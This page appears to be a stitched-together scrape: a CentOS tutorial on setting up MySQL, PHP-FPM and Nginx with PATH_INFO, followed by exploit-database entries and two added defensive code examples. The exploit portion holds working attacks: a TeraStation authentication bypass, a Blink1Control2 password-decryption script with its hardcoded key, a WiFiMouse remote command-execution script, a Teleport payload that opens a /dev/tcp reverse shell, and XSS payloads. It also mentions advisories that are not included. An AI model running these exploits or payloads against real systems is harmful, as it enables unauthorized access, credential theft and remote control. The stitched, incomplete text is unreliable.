In MySQL 8 a temporary root password is generated when the database is installed. View it with the following command:
grep 'A temporary password is generated for root@localhost' /var/log/mysqld.log | tail -1
Initialize the database:
sudo mysql_secure_installation
This prompts for root's password, which is the temporary password obtained in the previous step. Then enter the new root password twice and answer Y to all the remaining questions.
I don't know why, but after this change the application still cannot connect and log in. Use the following commands to set the root password again:
mysql -u root -p
use mysql;
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'youpassword';
systemctl restart mysqld # restart MySQL
Installing PHP
Install the Remi repository:
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm
Check which PHP 7+ versions are available in the Remi repository:
yum --disablerepo='*' --enablerepo='remi-safe' list php[7-9][0-9].x86_64
You will see output like this:
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
* remi-safe: mirrors.ukfast.co.uk
Available Packages
php70.x86_64 2.0-1.el7.remi remi-safe
php71.x86_64 2.0-1.el7.remi remi-safe
php72.x86_64 2.0-1.el7.remi remi-safe
php73.x86_64 2.0-1.el7.remi remi-safe
php74.x86_64 1.0-3.el7.remi remi-safe
php80.x86_64 1.0-3.el7.remi remi-safe
Enable the PHP version you want (7.4 is used as the example here):
sudo yum-config-manager --enable remi-php74
Install PHP:
yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-opcache php-pdo php-json
Configuration files
Configure php-fpm:
vim /etc/php-fpm.d/www.conf
The user and group variables default to apache. Change both of them to nginx.
Then find the listen directive. By default php-fpm listens on a specific host and port over TCP; change it so that it listens on a local Unix socket file instead, which improves the overall performance of the server:
listen = /var/run/php-fpm/php-fpm.sock
Finally, change the owner and group of the socket file just defined in the listen directive. Find the listen.owner, listen.group and listen.mode directives; they are commented out by default. Uncomment them by deleting the ; prefix at the beginning of each line, then set the owner and group to nginx:
listen.owner = nginx
listen.group = nginx
listen.mode = 0660
Finally start php-fpm:
systemctl start php-fpm
Configure Nginx to handle PHP
With the current configuration PHP files cannot be served yet; a little more configuration is needed.
Nginx has a dedicated directory in which each hosted website can be defined as a separate configuration file using a server block. This is similar to Apache's virtual hosts.
In a default installation this directory is empty. We will create a new file for the default PHP website on this server, which overrides the default server block defined in /etc/nginx/nginx.conf.
Open a new file in the /etc/nginx/conf.d directory:
vim /etc/nginx/conf.d/default.conf
# The content is as follows:
server {
    listen 80; # the port can be changed, e.g. to 8080
    server_name 192.168.x.x; # if you have no domain name, use the public or intranet IP
    root /var/www/html; # website path
    index index.php index.html index.htm;
    location / {
        try_files $uri $uri/ =404;
    }
    error_page 404 /404.html;
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /var/www/html; # website path
    }
    # PHP configuration part
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}
Restart Nginx to apply the changes:
sudo systemctl restart nginx
Configure website directory ownership and permissions
Both php-fpm and nginx now run as the nginx user, while the website directory is sometimes owned by root, so visiting the website returns a 404.
First check which users php-fpm and nginx are running as:
ps -ef | grep php
ps -ef | grep nginx
Then change the owner and group of the corresponding directory:
chown -R nginx:nginx /var/www/blog
and restart php-fpm and nginx again.
Configure PATH_INFO
Applications like Typecho need PATH_INFO enabled. Nginx does not support PATH_INFO by default, so change the PHP location block of the host to the following:
location ~ ^(.+\.php)(.*)$ {
    fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_split_path_info ^(.+\.php)(.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    include fastcgi_params;
}
and set the following in /etc/php.ini:
cgi.fix_pathinfo=1
Finally restart nginx and php-fpm.
These are the problems we have run into so far; we will write about the ones we encounter later.
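The PATH_INFO block above hands every URI matching ^(.+\.php)(.*)$ to php-fpm, and with cgi.fix_pathinfo=1 PHP walks back along the path to find a script to run. Unlike the first server block, it has no try_files ... =404 guard, so nginx never checks that the script named in the URI actually exists before forwarding the request; that combination is the classic nginx/PHP misconfiguration, and it is why the guard matters on any host that also accepts uploads. The following lint is an example added by the editor, not part of the tutorial: it scans nginx configuration text for PHP location blocks and reports those that forward to php-fpm without a try_files guard, or that call try_files after fastcgi_split_path_info without saving $fastcgi_path_info first (try_files resets it). The three configuration fragments are constructed for the example, modelled on the tutorial's blocks.

```python
import re

# Constructed config fragments (modelled on the tutorial's blocks, not copied from it).
# 1) PATH_INFO block with no try_files guard.
UNGUARDED_BLOCK = r"""
location ~ ^(.+\.php)(.*)$ {
    fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_split_path_info ^(.+\.php)(.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    include fastcgi_params;
}
"""
# 2) The same block with the guard: split first, save PATH_INFO (try_files resets it),
#    then refuse to forward unless the script file itself exists.
GUARDED_BLOCK = r"""
location ~ ^(.+\.php)(/.+)$ {
    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    set $path_info $fastcgi_path_info;
    try_files $fastcgi_script_name =404;
    fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $path_info;
    include fastcgi_params;
}
"""
# 3) A server block like the tutorial's first one, whose PHP location already has the guard.
SIMPLE_BLOCK = r"""
server {
    root /var/www/html;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
        include fastcgi_params;
    }
}
"""


def location_blocks(config: str):
    """Yield (pattern, body) for every location block, including ones nested in server {}."""
    for m in re.finditer(r"location\s+([^{]+)\{", config):
        depth, i = 1, m.end()
        while i < len(config) and depth:          # walk to the matching closing brace
            depth += {"{": 1, "}": -1}.get(config[i], 0)
            i += 1
        yield m.group(1).strip(), config[m.end():i - 1]


def audit_php_locations(config: str) -> dict:
    """Map each PHP location pattern to the list of problems found in its body."""
    findings = {}
    for pattern, body in location_blocks(config):
        if ".php" not in pattern or "fastcgi_pass" not in body:
            continue
        issues = []
        has_try_files = re.search(r"\btry_files\b", body) is not None
        if not has_try_files:
            issues.append("no try_files guard: request is forwarded to php-fpm "
                          "without checking that the script exists")
        if has_try_files and "fastcgi_split_path_info" in body \
                and not re.search(r"\bset\s+\$\w+\s+\$fastcgi_path_info\b", body):
            issues.append("try_files resets $fastcgi_path_info: save it with set "
                          "before try_files and pass the saved variable as PATH_INFO")
        if issues:
            findings[pattern] = issues
    return findings


if __name__ == "__main__":
    for name, cfg in (("unguarded", UNGUARDED_BLOCK), ("guarded", GUARDED_BLOCK), ("simple", SIMPLE_BLOCK)):
        print(name, audit_php_locations(cfg) or "ok")
```

A second layer that does not depend on the nginx block is php-fpm's own security.limit_extensions setting in www.conf (it defaults to .php), which makes php-fpm refuse to execute a file whose real extension is not on that list even when nginx forwards it; keep it set, and keep upload directories out of any PHP location.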
# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass
# Date: 2022-08-11
# Exploit Author: JORDAN GLOVER
# Type: WEBAPPS
# Platform: HARDWARE
# Vendor Homepage: https://www.buffalotech.com/
# Model: TeraStation Series
# Firmware Version: 1.66
# Tested on: Windows 10

An authentication bypass vulnerability in the web interface of Buffalo TeraStation Series Network Attached Storage (NAS) devices allows an unauthenticated malicious actor to gain administrative privileges.

The web interface can be accessed on port 80 or 443 with a web browser. You are presented with a login page that requires a username and password to authenticate to the NAS. Using a proxy tool to intercept the requests and responses, it was possible to intercept the login response and modify the JSON data contained in its body. Changing "success" to true and "pageMode" to 0 grants authentication to the NAS with administrator privileges.

POC #1 Authentication Failure

Request:
POST /dynamic.pl HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/static/index.html

bufaction=verifyLogin&user=Jordan&password=Jordan

Response:
HTTP/1.1 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Date: Mon, 30 Jun 2008 02:39:51 GMT
Server: lighttpd/1.4.32
Content-Length: 94

{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}

Incorrect Username or Password

POC #2 Authentication Success

Request:
POST /dynamic.pl HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/static/index.html

bufaction=verifyLogin&user=Jordan&password=Jordan

Intercepted Response:
HTTP/1.1 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Date: Mon, 30 Jun 2008 02:39:51 GMT
Server: lighttpd/1.4.32
Content-Length: 94

{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}

Login Successful

Blink1Control2 2.2.7 - Weak Password Encryption

// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
// Date: 2022-08-12
// Exploit Author: p1ckzi
// Vendor Homepage: https://thingm.com/
// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
// Vulnerable Version: blink1control2 <= 2.2.7
// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
// CVE: CVE-2022-35513
//
// Description:
// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
// of password storage which can be found by accessing the /blink1/input url
// of the api server.
// password ciphertext for skype logins and email are listed
// and can be decrypted. example usage:
// node blink1-pass-decrypt <ciphertext>

```javascript
#!/usr/bin/env node
const {ArgumentParser} = require('argparse');
const simpleCrypt = require('simplecrypt');

function exploit() {
  const BANNER = '\033[36m\n\
 _ _ _ _ _\n\
| |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\
| \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
| |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\
|_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\
|_|\n\
 _ _\n\
 __| | ___ ___ _ __ _ _ _ __ | |_\n\
 / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
| (_| | __| (__| | | |_| | |_) | |_\n\
 \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\
 |___/|_|\033[39m';

  const PARSER = new ArgumentParser({
    description: 'decrypts passwords found at the /blink/input url ' +
      'of the blink1control2 api server (version <= 2.2.7 ).'
  });
  PARSER.add_argument('ciphertext', {
    help: 'encrypted password string to use',
    type: 'str'
  });
  let args = PARSER.parse_args();

  // supplied ciphertext is decrypted with same salt, password, and method
  // used for encryption:
  try {
    let crypt = simpleCrypt({
      salt: 'boopdeeboop',
      password: 'blink1control',
      method: 'aes-192-ecb'
    });
    let ciphertext = args.ciphertext;
    let decrypted = crypt.decrypt(ciphertext);
    console.log(BANNER);
    console.log('\033[32m[+] decrypted password:\033[39m');
    console.log(decrypted);
  } catch (TypeError) {
    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
  } finally {
    process.exit(1);
  }
}

exploit()
```

WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

```bash
#!/bin/bash

printf "
WiFiMouse / MouseServer 1.8.3.4 Exploit by FEBIN
"
printf "[*] Enter the Target IP Address: "
read TARGET

rce(){
  printf "[*] Enter the Command to execute on the Target: "
  read CMD
  # the server accepts unauthenticated keystroke/text commands on TCP 1978
  sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){
  echo "[*] User's Home Directory Contents:"
  echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-
  while true
  do
    printf "\nList Directory:> "
    read DIR
    echo "[+] Contents of $DIR: "
    echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
  done
}

printf "
[1] Remote Command Execution
[2] Directory Listing
"
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
  rce
elif [[ $CHOICE == "2" ]]
then
  dirlist
else
  echo "[-] Invalid Choice!"
fi
```

Teleport v10.1.1 - Remote Code Execution (RCE)

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633

Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam

Decoded payload:
" /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add the XSS payload in the tab: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- The XSS is triggered.
# Go to this URL and the XSS will trigger:
# https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://profiles.wordpress.org/3dady/
# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.0.1
# CVE : N/A

# 1. Technical Description:
The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS, specifically in the dady_input_text and dady2_input_text fields, because the user's input is not properly sanitized, which allows the insertion of JavaScript code.

# 2. Proof of Concept (PoC):
a. Install and activate version 1.0 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
" autofocus onfocus=alert(/XSS/)>
d. Save the changes; the popup window demonstrating the vulnerability (PoC) appears immediately.

Note: This change is permanent until you modify the edited fields.
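The stored XSS entries on this page (WP-UserOnline's "Naming Conventions" fields, the Netroics post_title, and the 3dady input fields above) share one root cause: a saved setting is written back into markup without output encoding, so a value that closes the attribute or opens a tag changes the document structure. The code below is an added example for this page, not the plugins' code and not WordPress code: it shows the vulnerable concatenation beside the hardened version that entity-encodes for the attribute context, and checks that the three payloads quoted in these advisories stay inert inside the attribute and decode back to exactly the stored string. The field name is borrowed from the 3dady advisory for illustration; the sample values are constructed from the payloads quoted above.

```python
import html
import re

# Constructed sample values modelled on the payloads quoted in the advisories on this page.
SAMPLES = [
    '<script>alert(/XSS/)</script>',                          # WP-UserOnline style
    '" autofocus onfocus=alert(/XSS/)>',                      # 3dady style (attribute break-out)
    's1"><img src=x onerror=alert(document.cookie)>.gif',     # Netroics style
]


def naive_render(value: str) -> str:
    """The vulnerable pattern: a stored setting concatenated straight into markup."""
    return '<input type="text" name="dady_input_text" value="' + value + '">'


def safe_render(value: str) -> str:
    """Hardened: entity-encode for the attribute context (quote=True also encodes " and ')."""
    return '<input type="text" name="dady_input_text" value="' + html.escape(value, quote=True) + '">'


def breaks_out(rendered: str) -> bool:
    """True if the rendered markup is no longer a single <input> element."""
    return rendered.count('<') != 1 or rendered.count('>') != 1


def attribute_value(rendered: str) -> str:
    """The value attribute as an HTML parser would read it (first "..." after value=)."""
    m = re.search(r'value="([^"]*)"', rendered)
    return m.group(1) if m else ''


def round_trips(value: str) -> bool:
    """The escaped attribute decodes back to exactly the stored string, so nothing is lost."""
    return html.unescape(attribute_value(safe_render(value))) == value


if __name__ == "__main__":
    for s in SAMPLES:
        print("naive breaks out:", breaks_out(naive_render(s)),
              "| safe breaks out:", breaks_out(safe_render(s)),
              "| round-trips:", round_trips(s))
```

Encoding at output time is the fix that holds regardless of what was saved; in a WordPress plugin the same job is done by esc_attr() for attribute values and esc_html() for text content, and sanitizing on save is a complementary measure, not a replacement.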